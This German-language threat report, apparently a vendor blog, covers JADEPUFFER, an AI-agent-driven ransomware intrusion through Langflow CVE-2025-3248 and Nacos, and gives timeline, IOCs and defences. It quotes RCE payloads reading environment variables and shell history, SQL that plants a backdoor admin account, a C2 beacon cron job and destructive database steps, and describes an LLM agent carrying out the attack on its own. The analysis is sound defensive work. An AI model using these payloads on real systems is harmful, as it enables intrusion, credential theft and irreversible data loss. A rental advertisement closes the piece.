Was ist JADEPUFFER? Überblick über den ersten Agentic-Threat-Actor-Ransomware-Vorfall
Kernaussage: Sysdig definiert JADEPUFFER als Agentic Threat Actor (ATA) — Angriffsfähigkeit wird von einem AI Agent geliefert, nicht von manuell gesteuerten Toolkits. Eine neue offizielle Kategorie im Bericht.
| Dimension | Detail |
|---|---|
| Entdecker | Sysdig TRT, Autor Michael Clark (Director of Threat Research) |
| Veröffentlichung | 1. Juli 2026 (Medien 2.–6. Juli; öffentlicher Wahrnehmungsschwerpunkt oft 6. Juli) |
| Codename | JADEPUFFER (Sysdig offiziell in Großbuchstaben) |
| Einstiegssystem | Öffentlich exponierte Langflow-Instanz (CVE-2025-3248 RCE) |
| Eigentliches Ziel | Separater Produktionsserver mit MySQL + Nacos, ebenfalls öffentlich erreichbar |
| Umfang | 600+ eigenständige, zielgerichtete Payloads in komprimiertem Zeitfenster |
Timeline:
| Zeitpunkt | Ereignis |
|---|---|
| April 2025 | CVE-2025-3248 in Langflow (unauthentifizierte Code-Injection/RCE) |
| 5. Mai 2025 | CISA Known Exploited Vulnerabilities (KEV)-Eintrag |
| 2025 | Gleiche Schwachstelle für Flodrix-Botnet (Trend Micro, unabhängig von JADEPUFFER) |
| Juni 2026 | JADEPUFFER greift öffentliche Langflow-Instanz an; Kill Chain über Wochen in mehreren Sessions |
| 1. Juli 2026 | Sysdig veröffentlicht vollständigen Technikbericht |
| 2.–6. Juli 2026 | Dark Reading, BleepingComputer, CyberScoop, CSO Online, Security Affairs berichten |
Langflow öffentlich exponiert: AI-Agent-Orchestrierungsserver speichern häufig LLM-API-Keys und Cloud-Credentials in Umgebungsvariablen — hastige Deployments ohne Netzwerksegmentierung.
Langjährig gescannte Schwachstelle: CVE-2025-3248 EPSS 91,42 % (SentinelOne); Internet-Scanning und Weaponisierung laufen kontinuierlich.
Veraltete Downstream-Infrastruktur: Ziel nutzte Nacos-Auth-Bypass CVE-2021-29441 und nie rotierten Standard-JWT-Signaturschlüssel aus der Dokumentation seit 2020.
MySQL-root öffentlich: Agent verbindet sich mit root über exponierten Port; Credential-Herkunft unklar — möglicherweise vorbereiteter menschlicher Schritt.
Schlüssel nicht wiederherstellbar: uuid4()-Zufallsschlüssel nur auf stdout — Zahlung entschlüsselt nicht.
CVE-2025-3248: Wie Langflows unauthentifizierte RCE bewaffnet wurde
| Parameter | Detail |
|---|---|
| Komponente | Langflow — Open-Source-Framework für visuelle AI-Agent-Workflows, 70.000+ GitHub-Stars |
| Schwachstellentyp | CWE-94 (Code-Injection) + CWE-306 (fehlende Authentifizierung kritischer Funktionen) |
| CVSS | 9.8 Critical, Vektor CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Betroffene Versionen | Alle Langflow-Versionen vor 1.3.0 |
| Schwachstellenort | Endpunkt /api/v1/validate/code |
| Fix-Version | 1.3.0 (Authentifizierung ergänzt) |
Mechanismus Schritt für Schritt: Der Endpunkt soll benutzerdefinierte Funktionsknoten syntaktisch prüfen — implementiert als ast.parse() → compile() → exec(), ohne Authentifizierung und Sandbox. Bei Python-Funktionsdefinitionen werden Dekoratoren und Standardparameter sofort ausgewertet; Angreifer platzieren Malware in Default-Argumenten — beim „Validieren“ läuft Code bereits auf dem Server. Kein Login nötig, ein HTTP POST = RCE.
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')Trend Micro dokumentierte typische Payloads bei Flodrix (separate Kampagne). Abschließend ein 700-Byte-Bash-Skript lädt Flodrix-ELF-Binary und baut TCP/UDP-DDoS-Botnet.
| Dimension | Flodrix-Botnet | JADEPUFFER (dieser Vorfall) |
|---|---|---|
| Steuerung | Traditionell manuell/skriptbasiert | End-to-end LLM-Agent autonom |
| Einstieg | CVE-2025-3248 | CVE-2025-3248 |
| Ziel | DDoS-Botnet | Datenbank-Ransomware und destruktive Verschlüsselung |
| Verknüpfung | Zwei unabhängige Kampagnen — belegen langfristige Internet-Weaponisierung | |
Patch-Analyse: Langflow 1.3.0 fügt _current_user: CurrentActiveUser als Dependency Injection in post_validate_code ein; FastAPI prüft JWT Bearer oder x-api-key zuerst — bei Fehlschlag 401/403, Request erreicht Schwachstellenlogik nicht.
Langflow ist ein attraktiver Einstieg, weil AI-Agent-Server in Umgebungsvariablen oft OpenAI-, Anthropic-, DeepSeek-, Gemini- und ALIBABA_/AWS/GCP-Credentials speichern.
Vollständige Kill Chain: Phase 1 Langflow-Kompromittierung und Phase 2 Nacos-Übernahme
Phase 1 — Langflow-Host übernommen: Alle Payloads als Base64-kodiertes Python über RCE-Endpunkt.
Aufklärung und Credential-Sammlung (multithreaded): id, uname -a, hostname; parallel Scan nach OpenAI/Anthropic/DeepSeek/Gemini-API-Keys, ALIBABA_/ALIYUN_/TENCENT_/HUAWEI_/AWS/GCP/Azure-Credentials, Krypto-Mnemonics, DB-Konfiguration.
Lokaler Datendiebstahl: Export von Credentials und API-Keys aus Langflow-PostgreSQL-Backend, lokal gesichtet, Spuren gelöscht.
MinIO-Enumeration: Sondierung minio.internal:9000 und 127.0.0.1:9000, Default minioadmin:minioadmin, Buckets inkl. terraform-state und credentials.json. Erster Request mit ?format=json liefert XML — sofortiger Wechsel zu XML-Parser: typische Probe-Fehler-Anpassungs-Schleife.
Persistenz: Crontab alle 30 Minuten Beacon zu hxxp://45.131.66[.]106:4444/beacon.
Phase 2 — MySQL + Nacos-Produktionsserver: Nacos weit verbreitet in Alibaba-Microservices; Auth-Historie CVE-2021-29441, Standard-JWT-Signaturschlüssel seit 2020 in Dokumentation öffentlich, viele Deployments nie rotiert.
Nacos-Backdoor-Admin — 31-Sekunden-Selbstheilungs-Schleife (UTC):
| Zeit (UTC) | Aktion |
|---|---|
| 19:34:24 | subprocess.run erzeugt bcrypt-Hash, INSERT xadmin als Admin |
| 19:34:36 | Login-Versuch xadmin:Xploit@2026# fehlgeschlagen |
| 19:34:48 | 12 Sekunden später parallel nacos:nacos getestet, neuer admin123-Hash |
| 19:35:07 | subprocess.run aufgegeben, import bcrypt, defekten Datensatz gelöscht und neu erstellt |
| 19:35:18 | Login erfolgreich — gesamt 31 Sekunden |
cur.execute('DELETE FROM users WHERE username="xadmin"')
hash_val = bcrypt.hashpw(b'admin123', bcrypt.gensalt(rounds=10)).decode()
cur.execute('INSERT INTO users (username, password, enabled) VALUES ("xadmin", "' + hash_val + '", 1)')
cur.execute('INSERT INTO roles (username, role) VALUES ("xadmin", "ROLE_ADMIN")')Container-Escape-Sondierung (~8 Minuten): MySQL INTO OUTFILE / LOAD_FILE testet Schreiben, Lesen, /var/run/docker.sock, /proc/1/cgroup, /etc/hostname, UDF-Eskalation via mysql.func. Vor Ransomware Marker _pwn_cleanup.txt — Sysdig: strukturiertes Agent-Signal für nächste Phase, nicht festes Skript.
Destruktive Verschlüsselung: Alle 1.342 Nacos-Konfigurationseinträge mit AES_ENCRYPT() verschlüsselt, config_info und his_config_info gelöscht, Lösegeldtabelle README_RANSOM. Schlüssel per uuid4(), nur einmal gedruckt, nie gespeichert — Lösegeld hilft nicht. Brief behauptet AES-256; MySQL-Default ist AES-128-ECB. Enthält Nacos oft personenbezogene Konfiguration — relevant für DSGVO-Meldepflichten bei Betroffenheit.
Massenzerstörung: ROI-priorisiertes DROP DATABASE; Code-Kommentar behauptet Backup auf 64.20.53[.]230 — Sysdig ohne unabhängigen Nachweis. Bei Foreign-Key-Fehler nächster Payload mit SET GLOBAL FOREIGN_KEY_CHECKS=0 — Fehlerursache verstanden, nicht blind wiederholt.
Schutz nach JADEPUFFER: Sechs umsetzbare Maßnahmen
Basierend auf Sysdig-Abwehrempfehlungen und Event-IOCs können Teams sofort handeln:
Langflow aktualisieren: Sofort auf 1.3.0+ mit CVE-2025-3248-Fix; Code-Ausführungs-/Validierungs-Endpunkte nie öffentlich exponieren.
Schlüssel und Credentials isolieren: Keine LLM-API-Keys oder Cloud-Credentials in Umgebungsvariablen von AI-Orchestrierungsservern — KMS und Trennung von öffentlichen Prozessen.
Nacos härten: Standard token.secret.key ersetzen, Version mit erzwungenem Custom-Key, Nacos nie ins Internet, kein root-Zugriff auf Backend-DB von außen.
Datenbank-Zugriffskontrolle: Admin-Konten nicht öffentlich, starke eindeutige Credentials plus Quell-IP-Beschränkung.
Egress-Kontrolle: Beacon-Ausgang und externe Staging-Server blockieren (z. B. 45.131.66[.]106, 64.20.53[.]230).
Runtime-Detection und IOC-Monitoring: Malverhalten in DB-Prozessen erkennen; Crontab-Beacon, anomale User-Agents überwachen. Agent-Dev/Test-Isolation: Hilfezentrum.
Detection-Chance: LLM-Payloads enthalten natürlichsprachliche Kommentare zum „Warum“ — diese Selbstnarration ist ein neuer Erkennungshebel für Verteidiger.
Vier Autonomie-Indikatoren, Bitcoin-Rätsel, IOCs und Sysdig-Schlussfolgerungen
Vier unabhängige Evidenzlinien für „LLM-gesteuert“ (Sysdig):
Selbsterzählender Code: Natürlichsprachliche Kommentare zu ROI-Sortierung und größter Datenbank — typisches LLM-Codegenerierungsverhalten, nicht nachträgliche Forscherinterpretation.
Maschinelle Fehlerdiagnose: Nacos 31-Sekunden-Fix, MinIO XML/JSON-Anpassung, JWT-Pfad bei Blockade verworfen — Geschwindigkeit und Korrekturmethode nach Fehlern als präziseste Evidenz.
Natürlichsprachliches Kontextverständnis: Freitext der Zielumgebung geparst und „nur wenn verstanden sinnvolle“ Aktionen — über Wochen in verschiedenen Sessions wiederholt.
Bitcoin-Adress-Rätsel: Lösegeldadresse 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy ist Standard-P2SH-Beispieladresse in Bitcoin-Core-Dokumentation, häufig in LLM-Trainingsdaten; On-Chain 737 Transaktionen, ~46 BTC ein- und sofort weitergeleitet. LLM-Halluzination oder absichtliche Konfiguration — beides nicht ausschließbar.
| IOC-Typ | Indikator |
|---|---|
| C2 / Beacon | 45.131.66[.]106, Crontab → hxxp://45.131.66[.]106:4444/beacon |
| Daten-Staging | 64.20.53[.]230 (InterServer, AS19318) |
| Einstiegsschwachstelle | CVE-2025-3248 |
| Ransom-Bitcoin | 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy |
| Kontakt-E-Mail | e78393397[@]proton[.]me (kein Threat-Intel-Präzedenzfall) |
| Lösegeldtabellenname | README_RANSOM (passt nicht zu WARNING/RECOVER_YOUR_DATA) |
Branchenreaktion: BleepingComputer, Dark Reading u. a. sprechen vom „ersten vollständig KI-gesteuerten Ransomware“-Fall; CSO Online zitiert Red-Team-Experte Vibhum Dubey: besorgniserregender ist die „ruhige Phase“ vor Verschlüsselung — Agent kartiert Identitätssysteme und umgeht Detection; jeder Eindringversuch kann leicht abweichen. Medien erwähnen LLMjacking: gestohlene Credentials für Agent-Steuerung senken Grenzkosten multi-phasiger Angriffe gegen null.
CVSS 9.8 + EPSS 91,42 %: CVE-2025-3248 als dauerhaft gescannter Hochrisiko-Einstieg (NVD / SentinelOne).
600+ Payloads: Kohärente Ausführung in komprimiertem Fenster — Skala und Konsistenz deuten auf autonomen Agent, nicht festes Toolkit.
1.342 verschlüsselte Configs + nicht wiederherstellbarer Schlüssel: Selbst bei Zahlung sind Opferdaten faktisch dauerhaft verloren — DSGVO-relevante Meldung prüfen.
Sysdig — vier Schlussfolgerungen: ① Ransomware-Schwelle sinkt auf „Kosten eines laufenden Agents“; ② alte Schwachstellen werden automatisiert weaponisiert — „gesamte CVE-Historie durchprobieren“ kostet fast nichts; ③ LLM-Selbstnarration liefert lesbare Detection-Oberfläche; ④ „Backup erfolgt“ nur Agent-Code-Kommentar, unverifiziert.
Alternativen im Vergleich: Langflow/Nacos öffentlich für Agent-Prototypen übergibt API-Keys und Topologie an Scanner; lokales Notebook 7×24 für autonome Agents erschwert Egress-Kontrolle und Runtime-Detection; macOS-Agent-Orchestrierung in VM verletzt EULA und limitiert Metal. Für AI-Agent-Produktion und Red-Team-Simulation mit iOS-CI/CD, vollem Root, isolierter Testumgebung und 7×24-Stabilität ist KVMNODE dedizierte Mac Mini M4 Cloud-Miete meist die bessere Wahl: 100 % physische Hardware, offenes sudo, flexible Tages-/Wochen-/Monatsmiete — Agent-Workflows auditierbar getrennt vom Produktionsnetz. Details: Mietpreise. JADEPUFFER zeigt: Skill-Schwelle = Agent-Betriebskosten — öffentliche App-Server, ungehärtete Config-Center und öffentlich erreichbare DB-Admins sind primäre Angriffsflächen.
Quellen: Sysdig „JADEPUFFER: Agentic ransomware for automated database extortion“; BleepingComputer, Dark Reading, CyberScoop, CSO Online, Security Affairs; Trend Micro CVE-2025-3248 / Flodrix; NVD, CISA KEV.